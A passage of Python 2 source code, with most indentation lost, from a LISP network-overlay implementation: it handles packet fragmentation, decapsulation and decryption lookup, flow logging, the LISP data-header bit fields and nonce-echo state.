def fragment_outer(self, outer_hdr, inner_packet):
frag_len = 1000
#
# Break up packet payload in fragments and put in array to have
# IP header added in next loop below.
#
frags = []
offset = 0
length = len(inner_packet)
while (offset < length):
frag = inner_packet[offset::]
if (len(frag) > frag_len): frag = frag[0:frag_len]
frags.append(frag)
offset += len(frag)
#endwhile
#
# Now fix outer IPv4 header with fragment-offset values and add the
# IPv4 value.
#
fragments = []
offset = 0
for frag in frags:
#
# Set frag-offset field in outer IPv4 header.
#
fo = offset if (frag == frags[-1]) else 0x2000 + offset
fo = socket.htons(fo)
outer_hdr = outer_hdr[0:6] + struct.pack("H", fo) + outer_hdr[8::]
#
# Set total-length field in outer IPv4 header and checksum.
#
l = socket.htons(len(frag) + 20)
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragments.append(outer_hdr + frag)
offset += len(frag) / 8
#endfor
return(fragments)
#enddef
def fragment(self):
packet = self.fix_outer_header(self.packet)
#
# If inner header is IPv4, we will fragment the inner header and encap
# each fragment. If the inner header is IPv6, we will not add the
# Fragmentation Header into the inner IPv6 packet.
#
length = len(packet)
if (length <= 1500): return([packet], "Fragment-None")
packet = self.packet
#
# Fragment outer IPv4 header if inner packet is IPv6 (or Mac frame).
# We cannot fragment IPv6 packet since we are not the source.
#
if (self.inner_version != 4):
ident = random.randint(0, 0xffff)
outer_hdr = packet[0:4] + struct.pack("H", ident) + packet[6:20]
inner_packet = packet[20::]
fragments = self.fragment_outer(outer_hdr, inner_packet)
return(fragments, "Fragment-Outer")
#endif
#
# Fragment inner IPv4 packet.
#
outer_hdr_len = 56 if (self.outer_version == 6) else 36
outer_hdr = packet[0:outer_hdr_len]
inner_hdr = packet[outer_hdr_len: outer_hdr_len + 20]
inner_packet = packet[outer_hdr_len + 20::]
#
# If DF-bit is set, don't fragment packet.
#
frag_field = struct.unpack("H", inner_hdr[6:8])[0]
frag_field = socket.ntohs(frag_field)
ignore_df = os.getenv("LISP_IGNORE_DF_BIT") != None
if (frag_field & 0x4000):
if (ignore_df):
frag_field &= ~0x4000
else:
df_bit = bold("DF-bit set", False)
dprint("{} in inner header, packet discarded".format(df_bit))
return([], "Fragment-None-DF-bit")
#endif
#endif
offset = 0
length = len(inner_packet)
fragments = []
while (offset < length):
fragments.append(inner_packet[offset:offset+1400])
offset += 1400
#endwhile
#
# Now put inner header and outer header on each fragment.
#
frags = fragments
fragments = []
mf = True if frag_field & 0x2000 else False
frag_field = (frag_field & 0x1fff) * 8
for frag in frags:
#
# Set fragment-offset and MF bit if not last fragment.
#
ff = frag_field / 8
if (mf):
ff |= 0x2000
elif (frag != frags[-1]):
ff |= 0x2000
#endif
ff = socket.htons(ff)
inner_hdr = inner_hdr[0:6] + struct.pack("H", ff) + inner_hdr[8::]
#
# Set length of fragment, set up offset for next fragment-offset,
# and header checksum fragment packet. Then prepend inner header
# to payload.
#
length = len(frag)
frag_field += length
l = socket.htons(length + 20)
inner_hdr = inner_hdr[0:2] + struct.pack("H", l) + \
inner_hdr[4:10] + struct.pack("H", 0) + inner_hdr[12::]
inner_hdr = lisp_ip_checksum(inner_hdr)
fragment = inner_hdr + frag
#
# Change outer header length and header checksum if IPv4 outer
# header. If IPv6 outer header, raw sockets prepends the header.
#
length = len(fragment)
if (self.outer_version == 4):
l = length + outer_hdr_len
length += 16
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + \
outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragment = outer_hdr + fragment
fragment = self.fix_outer_header(fragment)
#endif
#
# Finally fix outer UDP header length. Byte-swap it.
#
udp_len_index = outer_hdr_len - 12
l = socket.htons(length)
fragment = fragment[0:udp_len_index] + struct.pack("H", l) + \
fragment[udp_len_index+2::]
fragments.append(fragment)
#endfor
return(fragments, "Fragment-Inner")
#enddef
def fix_outer_header(self, packet):
#
# IP_HDRINCL requires the total-length and frag-offset fields to be
# in host byte order, so they have to be byte-swapped here. But when testing
# we (UPC guys) discovered the frag field didn't need swapping. The
# conclusion is that byte-swapping is necessary for MacOS but not for
# Linux OSes.
#
if (self.outer_version == 4 or self.inner_version == 4):
if (lisp_is_macos()):
packet = packet[0:2] + packet[3] + packet[2] + packet[4:6] + \
packet[7] + packet[6] + packet[8::]
else:
packet = packet[0:2] + packet[3] + packet[2] + packet[4::]
#endif
#endif
return(packet)
#enddef
def send_packet(self, lisp_raw_socket, dest):
if (lisp_flow_logging and dest != self.inner_dest): self.log_flow(True)
dest = dest.print_address_no_iid()
fragments, in_or_out = self.fragment()
for fragment in fragments:
if (len(fragments) != 1):
self.packet = fragment
self.print_packet(in_or_out, True)
#endif
try: lisp_raw_socket.sendto(fragment, (dest, 0))
except socket.error, e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#endfor
#enddef
def send_l2_packet(self, l2_socket, mac_header):
if (l2_socket == None):
lprint("No layer-2 socket, drop IPv6 packet")
return
#endif
if (mac_header == None):
lprint("Could not build MAC header, drop IPv6 packet")
return
#endif
packet = mac_header + self.packet
# try: l2_socket.send(packet)
# except socket.error, e:
# lprint("send_l2_packet(): socket.send() failed: {}".format(e))
# #endtry
# return
#
# Use tuntap tunnel interface instead of raw sockets for IPv6
# decapsulated packets.
#
l2_socket.write(packet)
return
#enddef
def bridge_l2_packet(self, eid, db):
try: dyn_eid = db.dynamic_eids[eid.print_address_no_iid()]
except: return
try: interface = lisp_myinterfaces[dyn_eid.interface]
except: return
try:
socket = interface.get_bridge_socket()
if (socket == None): return
except: return
try: socket.send(self.packet)
except socket.error, e:
lprint("bridge_l2_packet(): socket.send() failed: {}".format(e))
#endtry
#enddef
def is_lisp_packet(self, packet):
udp = (struct.unpack("B", packet[9])[0] == LISP_UDP_PROTOCOL)
if (udp == False): return(False)
port = struct.unpack("H", packet[22:24])[0]
if (socket.ntohs(port) == LISP_DATA_PORT): return(True)
port = struct.unpack("H", packet[20:22])[0]
if (socket.ntohs(port) == LISP_DATA_PORT): return(True)
return(False)
#enddef
def decode(self, is_lisp_packet, lisp_ipc_socket, stats):
self.packet_error = ""
packet = self.packet
orig_len = len(packet)
L3 = L2 = True
#
# Get version number of outer header so we can decode outer addresses.
#
header_len = 0
iid = 0
if (is_lisp_packet):
iid = self.lisp_header.get_instance_id()
version = struct.unpack("B", packet[0:1])[0]
self.outer_version = version >> 4
if (self.outer_version == 4):
#
# MacOS is zeroing the IP header checksum for a raw socket.
# If we receive this, bypass the checksum calculation.
#
orig_checksum = struct.unpack("H", packet[10:12])[0]
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
if (orig_checksum != 0 or lisp_is_macos() == False):
self.packet_error = "checksum-error"
if (stats):
stats[self.packet_error].increment(orig_len)
#endif
lprint("IPv4 header checksum failed for outer header")
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
afi = LISP_AFI_IPV4
offset = 12
self.outer_tos = struct.unpack("B", packet[1:2])[0]
self.outer_ttl = struct.unpack("B", packet[8:9])[0]
header_len = 20
elif (self.outer_version == 6):
afi = LISP_AFI_IPV6
offset = 8
tos = struct.unpack("H", packet[0:2])[0]
self.outer_tos = (socket.ntohs(tos) >> 4) & 0xff
self.outer_ttl = struct.unpack("B", packet[7:8])[0]
header_len = 40
else:
self.packet_error = "outer-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode outer header")
return(None)
#endif
self.outer_source.afi = afi
self.outer_dest.afi = afi
addr_length = self.outer_source.addr_length()
self.outer_source.unpack_address(packet[offset:offset+addr_length])
offset += addr_length
self.outer_dest.unpack_address(packet[offset:offset+addr_length])
packet = packet[header_len::]
self.outer_source.mask_len = self.outer_source.host_mask_len()
self.outer_dest.mask_len = self.outer_dest.host_mask_len()
#
# Get UDP fields
#
short = struct.unpack("H", packet[0:2])[0]
self.udp_sport = socket.ntohs(short)
short = struct.unpack("H", packet[2:4])[0]
self.udp_dport = socket.ntohs(short)
short = struct.unpack("H", packet[4:6])[0]
self.udp_length = socket.ntohs(short)
short = struct.unpack("H", packet[6:8])[0]
self.udp_checksum = socket.ntohs(short)
packet = packet[8::]
#
# Determine what is inside, a packet or a frame.
#
L3 = (self.udp_dport == LISP_DATA_PORT or
self.udp_sport == LISP_DATA_PORT)
L2 = (self.udp_dport in (LISP_L2_DATA_PORT, LISP_VXLAN_DATA_PORT))
#
# Get LISP header fields.
#
if (self.lisp_header.decode(packet) == False):
self.packet_error = "lisp-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
lprint("Cannot decode LISP header")
return(None)
#endif
packet = packet[8::]
iid = self.lisp_header.get_instance_id()
header_len += 16
#endif
if (iid == 0xffffff): iid = 0
#
# Time to decrypt if K-bits set.
#
decrypted = False
key_id = self.lisp_header.k_bits
if (key_id):
addr_str = lisp_get_crypto_decap_lookup_key(self.outer_source,
self.udp_sport)
if (addr_str == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} for key-id {} to decrypt packet".format(ks, key_id))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
key = lisp_crypto_keys_by_rloc_decap[addr_str][key_id]
if (key == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} to decrypt packet from RLOC {}".format(ks,
red(addr_str, False)))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#
# Decrypt and continue processing inner header.
#
key.use_count += 1
packet, decrypted = self.decrypt(packet, header_len, key,
addr_str)
if (decrypted == False):
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
#
# Get inner header fields.
#
version = struct.unpack("B", packet[0:1])[0]
self.inner_version = version >> 4
if (L3 and self.inner_version == 4 and version >= 0x45):
packet_len = socket.ntohs(struct.unpack("H", packet[2:4])[0])
self.inner_tos = struct.unpack("B", packet[1:2])[0]
self.inner_ttl = struct.unpack("B", packet[8:9])[0]
self.inner_protocol = struct.unpack("B", packet[9:10])[0]
self.inner_source.afi = LISP_AFI_IPV4
self.inner_dest.afi = LISP_AFI_IPV4
self.inner_source.unpack_address(packet[12:16])
self.inner_dest.unpack_address(packet[16:20])
frag_field = socket.ntohs(struct.unpack("H", packet[6:8])[0])
self.inner_is_fragment = (frag_field & 0x2000 or (frag_field & 0x1fff) != 0)
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[20:22])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[22:24])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L3 and self.inner_version == 6 and version >= 0x60):
packet_len = socket.ntohs(struct.unpack("H", packet[4:6])[0]) + 40
tos = struct.unpack("H", packet[0:2])[0]
self.inner_tos = (socket.ntohs(tos) >> 4) & 0xff
self.inner_ttl = struct.unpack("B", packet[7:8])[0]
self.inner_protocol = struct.unpack("B", packet[6:7])[0]
self.inner_source.afi = LISP_AFI_IPV6
self.inner_dest.afi = LISP_AFI_IPV6
self.inner_source.unpack_address(packet[8:24])
self.inner_dest.unpack_address(packet[24:40])
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[40:42])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[42:44])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L2):
packet_len = len(packet)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_source.afi = LISP_AFI_MAC
self.inner_dest.afi = LISP_AFI_MAC
self.inner_dest.unpack_address(self.swap_mac(packet[0:6]))
self.inner_source.unpack_address(self.swap_mac(packet[6:12]))
elif (self.lisp_header.get_instance_id() == 0xffffff):
if (lisp_flow_logging): self.log_flow(False)
return(self)
else:
self.packet_error = "bad-inner-version"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode encapsulation, header version {}".format(\
hex(version)))
packet = lisp_format_packet(packet[0:20])
lprint("Packet header: {}".format(packet))
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(None)
#endif
self.inner_source.mask_len = self.inner_source.host_mask_len()
self.inner_dest.mask_len = self.inner_dest.host_mask_len()
self.inner_source.instance_id = iid
self.inner_dest.instance_id = iid
#
# If we are configured to do Nonce-Echoing, do lookup on source-EID
# to obtain source RLOC to store nonce to echo.
#
if (lisp_nonce_echoing and is_lisp_packet):
echo_nonce = lisp_get_echo_nonce(self.outer_source, None)
if (echo_nonce == None):
rloc_str = self.outer_source.print_address_no_iid()
echo_nonce = lisp_echo_nonce(rloc_str)
#endif
nonce = self.lisp_header.get_nonce()
if (self.lisp_header.is_e_bit_set()):
echo_nonce.receive_request(lisp_ipc_socket, nonce)
elif (echo_nonce.request_nonce_sent):
echo_nonce.receive_echo(lisp_ipc_socket, nonce)
#endif
#endif
#
# If we decrypted, we may have to truncate packet if the encrypter
# padded the packet.
#
if (decrypted): self.packet += packet[:packet_len]
#
# Log a packet that was parsed correctly.
#
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(self)
#enddef
def swap_mac(self, mac):
return(mac[1] + mac[0] + mac[3] + mac[2] + mac[5] + mac[4])
#enddef
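    #
    # Illustrative note for swap_mac() above: it swaps each adjacent byte
    # pair, so an on-wire MAC of 00:11:22:33:44:55 comes back as
    # 11:00:33:22:55:44. This presumably matches the 16-bit word order the
    # MAC pack/unpack routines elsewhere in this file expect.
    #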
def strip_outer_headers(self):
offset = 16
offset += 20 if (self.outer_version == 4) else 40
self.packet = self.packet[offset::]
return(self)
#enddef
def hash_ports(self):
packet = self.packet
version = self.inner_version
hashval = 0
if (version == 4):
protocol = struct.unpack("B", packet[9])[0]
if (self.inner_is_fragment): return(protocol)
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[20:24])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
if (version == 6):
protocol = struct.unpack("B", packet[6])[0]
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[40:44])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
return(hashval)
#enddef
def hash_packet(self):
hashval = self.inner_source.address ^ self.inner_dest.address
hashval += self.hash_ports()
if (self.inner_version == 4):
hashval = (hashval >> 16) ^ (hashval & 0xffff)
elif (self.inner_version == 6):
hashval = (hashval >> 64) ^ (hashval & 0xffffffffffffffff)
hashval = (hashval >> 32) ^ (hashval & 0xffffffff)
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
self.udp_sport = 0xf000 | (hashval & 0xfff)
#enddef
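    #
    # Worked example for hash_packet() above (illustrative): the inner
    # source/dest address xor is folded down to 16 bits, hash_ports()
    # mixes in the protocol and TCP/UDP ports, and the low 12 bits of the
    # result are merged into 0xf000. The computed UDP source port
    # therefore always lands in 0xf000-0xffff (61440-65535), giving the
    # underlay 4096 distinct flow labels for ECMP load-splitting while
    # staying out of the well-known port space.
    #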
def print_packet(self, s_or_r, is_lisp_packet):
if (is_lisp_packet == False):
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(("{} {}, tos/ttl: {}/{}, length: {}, packet: {} ..."). \
format(bold(s_or_r, False),
green(iaddr_str, False), self.inner_tos,
self.inner_ttl, len(self.packet),
lisp_format_packet(self.packet[0:60])))
return
#endif
if (s_or_r.find("Receive") != -1):
ed = "decap"
ed += "-vxlan" if self.udp_dport == LISP_VXLAN_DATA_PORT else ""
else:
ed = s_or_r
if (ed in ["Send", "Replicate"] or ed.find("Fragment") != -1):
ed = "encap"
#endif
#endif
oaddr_str = "{} -> {}".format(self.outer_source.print_address_no_iid(),
self.outer_dest.print_address_no_iid())
#
# Special case where Info-Request is inside of a 4341 packet for
# NAT-traversal.
#
if (self.lisp_header.get_instance_id() == 0xffffff):
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, ")
line += bold("control-packet", False) + ": {} ..."
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport,
self.udp_dport, lisp_format_packet(self.packet[0:56])))
return
else:
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, inner EIDs: {}, " + \
"inner tos/ttl: {}/{}, length: {}, {}, packet: {} ...")
#endif
if (self.lisp_header.k_bits):
if (ed == "encap"): ed = "encrypt/encap"
if (ed == "decap"): ed = "decap/decrypt"
#endif
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport, self.udp_dport,
green(iaddr_str, False), self.inner_tos, self.inner_ttl,
len(self.packet), self.lisp_header.print_header(ed),
lisp_format_packet(self.packet[0:56])))
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.inner_source, self.inner_dest))
#enddef
def get_raw_socket(self):
iid = str(self.lisp_header.get_instance_id())
if (iid == "0"): return(None)
if (lisp_iid_to_interface.has_key(iid) == False): return(None)
interface = lisp_iid_to_interface[iid]
s = interface.get_socket()
if (s == None):
string = bold("SO_BINDTODEVICE", False)
enforce = (os.getenv("LISP_ENFORCE_BINDTODEVICE") != None)
lprint("{} required for multi-tenancy support, {} packet".format( \
string, "drop" if enforce else "forward"))
if (enforce): return(None)
#endif
iid = bold(iid, False)
d = bold(interface.device, False)
dprint("Send packet on instance-id {} interface {}".format(iid, d))
return(s)
#enddef
def log_flow(self, encap):
global lisp_flow_log
dump = os.path.exists("./log-flows")
if (len(lisp_flow_log) == LISP_FLOW_LOG_SIZE or dump):
args = [lisp_flow_log]
lisp_flow_log = []
threading.Thread(target=lisp_write_flow_log, args=args).start()
if (dump): os.system("rm ./log-flows")
return
#endif
ts = datetime.datetime.now()
lisp_flow_log.append([ts, encap, self.packet, self])
    #enddef
def print_flow(self, ts, encap, packet):
ts = ts.strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
flow = "{}: {}".format(ts, "encap" if encap else "decap")
osrc = red(self.outer_source.print_address_no_iid(), False)
odst = red(self.outer_dest.print_address_no_iid(), False)
isrc = green(self.inner_source.print_address(), False)
idst = green(self.inner_dest.print_address(), False)
if (self.lisp_header.get_instance_id() == 0xffffff):
flow += " {}:{} -> {}:{}, LISP control message type {}\n"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
self.inner_version)
return(flow)
#endif
if (self.outer_dest.is_null() == False):
flow += " {}:{} -> {}:{}, len/tos/ttl {}/{}/{}"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
len(packet), self.outer_tos, self.outer_ttl)
#endif
#
# Can't look at inner header if encrypted. Protecting user privacy.
#
if (self.lisp_header.k_bits != 0):
error = "\n"
if (self.packet_error != ""):
error = " ({})".format(self.packet_error) + error
#endif
flow += ", encrypted" + error
return(flow)
#endif
#
# Position to inner header.
#
if (self.outer_dest.is_null() == False):
packet = packet[36::] if self.outer_version == 4 else packet[56::]
#endif
protocol = packet[9] if self.inner_version == 4 else packet[6]
protocol = struct.unpack("B", protocol)[0]
flow += " {} -> {}, len/tos/ttl/prot {}/{}/{}/{}"
flow = flow.format(isrc, idst, len(packet), self.inner_tos,
self.inner_ttl, protocol)
#
# Show some popular transport layer data.
#
if (protocol in [6, 17]):
ports = packet[20:24] if self.inner_version == 4 else packet[40:44]
if (len(ports) == 4):
ports = socket.ntohl(struct.unpack("I", ports)[0])
flow += ", ports {} -> {}".format(ports >> 16, ports & 0xffff)
#endif
elif (protocol == 1):
seq = packet[26:28] if self.inner_version == 4 else packet[46:48]
if (len(seq) == 2):
seq = socket.ntohs(struct.unpack("H", seq)[0])
flow += ", icmp-seq {}".format(seq)
#endif
        #endif
if (self.packet_error != ""):
flow += " ({})".format(self.packet_error)
#endif
flow += "\n"
return(flow)
    #enddef
def is_trace(self):
ports = [self.inner_sport, self.inner_dport]
return(self.inner_protocol == LISP_UDP_PROTOCOL and
LISP_TRACE_PORT in ports)
#enddef
#endclass
#
# LISP encapsulation header definition.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4341 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L |N|L|E|V|I|P|K|K| Nonce/Map-Version |
# I \ +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# S / | Instance ID/Locator-Status-Bits |
# P +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_N_BIT = 0x80000000
LISP_L_BIT = 0x40000000
LISP_E_BIT = 0x20000000
LISP_V_BIT = 0x10000000
LISP_I_BIT = 0x08000000
LISP_P_BIT = 0x04000000
LISP_K_BITS = 0x03000000
class lisp_data_header():
def __init__(self):
self.first_long = 0
self.second_long = 0
self.k_bits = 0
#enddef
def print_header(self, e_or_d):
first_long = lisp_hex_string(self.first_long & 0xffffff)
second_long = lisp_hex_string(self.second_long).zfill(8)
line = ("{} LISP-header -> flags: {}{}{}{}{}{}{}{}, nonce: {}, " + \
"iid/lsb: {}")
return(line.format(bold(e_or_d, False),
"N" if (self.first_long & LISP_N_BIT) else "n",
"L" if (self.first_long & LISP_L_BIT) else "l",
"E" if (self.first_long & LISP_E_BIT) else "e",
"V" if (self.first_long & LISP_V_BIT) else "v",
"I" if (self.first_long & LISP_I_BIT) else "i",
"P" if (self.first_long & LISP_P_BIT) else "p",
"K" if (self.k_bits in [2,3]) else "k",
"K" if (self.k_bits in [1,3]) else "k",
first_long, second_long))
#enddef
def encode(self):
packet_format = "II"
first_long = socket.htonl(self.first_long)
second_long = socket.htonl(self.second_long)
header = struct.pack(packet_format, first_long, second_long)
return(header)
#enddef
def decode(self, packet):
packet_format = "II"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long, second_long = \
struct.unpack(packet_format, packet[:format_size])
self.first_long = socket.ntohl(first_long)
self.second_long = socket.ntohl(second_long)
self.k_bits = (self.first_long & LISP_K_BITS) >> 24
return(True)
#enddef
def key_id(self, key_id):
self.first_long &= ~(0x3 << 24)
self.first_long |= ((key_id & 0x3) << 24)
self.k_bits = key_id
#enddef
def nonce(self, nonce):
self.first_long |= LISP_N_BIT
self.first_long |= nonce
#enddef
def map_version(self, version):
self.first_long |= LISP_V_BIT
self.first_long |= version
#enddef
def instance_id(self, iid):
if (iid == 0): return
self.first_long |= LISP_I_BIT
self.second_long &= 0xff
self.second_long |= (iid << 8)
#enddef
def get_instance_id(self):
return((self.second_long >> 8) & 0xffffff)
#enddef
def locator_status_bits(self, lsbs):
self.first_long |= LISP_L_BIT
self.second_long &= 0xffffff00
self.second_long |= (lsbs & 0xff)
#enddef
def is_request_nonce(self, nonce):
return(nonce & 0x80000000)
#enddef
def request_nonce(self, nonce):
self.first_long |= LISP_E_BIT
self.first_long |= LISP_N_BIT
self.first_long |= (nonce & 0xffffff)
#enddef
def is_e_bit_set(self):
return(self.first_long & LISP_E_BIT)
#enddef
def get_nonce(self):
return(self.first_long & 0xffffff)
#enddef
#endclass
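#
# Round-trip sketch for lisp_data_header, illustrative only since nothing
# in this file calls it: encode a header carrying a nonce and instance-id,
# decode the 8-byte result, and verify both fields survive.
#
def lisp_example_data_header_roundtrip():
    encode_header = lisp_data_header()
    encode_header.nonce(0xabcdef)
    encode_header.instance_id(1000)
    raw = encode_header.encode()
    decode_header = lisp_data_header()
    if (decode_header.decode(raw) == False): return(False)
    return(decode_header.get_nonce() == 0xabcdef and
        decode_header.get_instance_id() == 1000)
#enddef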
class lisp_echo_nonce():
def __init__(self, rloc_str):
self.rloc_str = rloc_str
self.rloc = lisp_address(LISP_AFI_NONE, rloc_str, 0, 0)
self.request_nonce_sent = None
self.echo_nonce_sent = None
self.last_request_nonce_sent = None
self.last_new_request_nonce_sent = None
self.last_echo_nonce_sent = None
self.last_new_echo_nonce_sent = None
self.request_nonce_rcvd = None
self.echo_nonce_rcvd = None
self.last_request_nonce_rcvd = None
self.last_echo_nonce_rcvd = None
self.last_good_echo_nonce_rcvd = None
lisp_nonce_echo_list[rloc_str] = self
#enddef
def send_ipc(self, ipc_socket, ipc):
source = "lisp-itr" if lisp_i_am_itr else "lisp-etr"
dest = "lisp-etr" if lisp_i_am_itr else "lisp-itr"
ipc = lisp_command_ipc(ipc, source)
lisp_ipc(ipc, ipc_socket, dest)
#enddef
def send_request_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%R%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def send_echo_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%E%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def receive_request(self, ipc_socket, nonce):
old_nonce = self.request_nonce_rcvd
self.request_nonce_rcvd = nonce
self.last_request_nonce_rcvd = lisp_get_timestamp()
if (lisp_i_am_rtr): return
if (old_nonce != nonce): self.send_request_ipc(ipc_socket, nonce)
#enddef
def receive_echo(self, ipc_socket, nonce):
if (self.request_nonce_sent != nonce): return
self.last_echo_nonce_rcvd = lisp_get_timestamp()
if (self.echo_nonce_rcvd == nonce): return
self.echo_nonce_rcvd = nonce
if (lisp_i_am_rtr): return
self.send_echo_ipc(ipc_socket, nonce)
#enddef
def get_request_or_echo_nonce(self, ipc_socket, remote_rloc):
#
# If we are in both request-nonce and echo-nonce mode, let the
# higher IP addressed RLOC be in request mode.
#
if (self.request_nonce_sent and self.echo_nonce_sent and remote_rloc):
local_rloc = lisp_myrlocs[0] if remote_rloc.is_ipv4() \
else lisp_myrlocs[1]
if (remote_rloc.address > local_rloc.address):
a = "exit"
self.request_nonce_sent = None
else:
a = "stay in"
self.echo_nonce_sent = None
#endif
c = bold("collision", False)
l = red(local_rloc.print_address_no_iid(), False)
r = red(remote_rloc.print_address_no_iid(), False)
lprint("Echo nonce {}, {} -> {}, {} request-nonce mode".format(c,
l, r, a))
#endif
#
# If we are echoing, return echo-nonce. Or get out of echo-nonce mode.
#
if (self.echo_nonce_sent != None):
nonce = self.echo_nonce_sent
e = bold("Echoing", False)
lprint("{} nonce 0x{} to {}".format(e,
lisp_hex_string(nonce), red(self.rloc_str, False)))
self.last_echo_nonce_sent = lisp_get_timestamp()
self.echo_nonce_sent = None
return(nonce)
#endif
#endif
#
# Should we stop requesting nonce-echoing? Only do so if we received
        # an echo response and some time (10 seconds) has passed.
#
nonce = self.request_nonce_sent
last = self.last_request_nonce_sent
if (nonce and last != None):
if (time.time() - last >= LISP_NONCE_ECHO_INTERVAL):
self.request_nonce_sent = None
lprint("Stop request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
return(None)
#endif
#endif
#
        # Start echoing the nonce. Get a new nonce. If an echo-nonce is
        # stored, use the same nonce as last time regardless of whether we
        # received an echo response. A set high-order bit tells the caller
        # to set the e-bit in the header.
#
if (nonce == None):
nonce = lisp_get_data_nonce()
if (self.recently_requested()): return(nonce)
self.request_nonce_sent = nonce
lprint("Start request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
self.last_new_request_nonce_sent = lisp_get_timestamp()
#
# Send the request-nonce to the ETR so it can tell us when the
# other side has echoed this request-nonce.
#
if (lisp_i_am_itr == False): return(nonce | 0x80000000)
self.send_request_ipc(ipc_socket, nonce)
else:
lprint("Continue request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
#endif
#
# Continue sending request-nonce. But if we never received an echo,
# don't update timer.
#
self.last_request_nonce_sent = lisp_get_timestamp()
return(nonce | 0x80000000)
#enddef
def request_nonce_timeout(self):
if (self.request_nonce_sent == None): return(False)
if (self.request_nonce_sent == self.echo_nonce_rcvd): return(False)
elapsed = time.time() - self.last_request_nonce_sent
last_resp = self.last_echo_nonce_rcvd
return(elapsed >= LISP_NONCE_ECHO_INTERVAL and last_resp == None)
#enddef
def recently_requested(self):
last_resp = self.last_request_nonce_sent
if (last_resp == None): return(False)
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def recently_echoed(self):
if (self.request_nonce_sent == None): return(True)
#
        # Check how long it's been since the last received echo.
#
last_resp = self.last_good_echo_nonce_rcvd
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
if (elapsed <= LISP_NONCE_ECHO_INTERVAL): return(True)
#
        # If the last received echo was a while ago and a new request-nonce
        # was sent recently, say the echo happened so we can bootstrap a new
        # request and echo exchange.
#
last_resp = self.last_new_request_nonce_sent
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def change_state(self, rloc):
if (rloc.up_state() and self.recently_echoed() == False):
down = bold("down", False)
good_echo = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
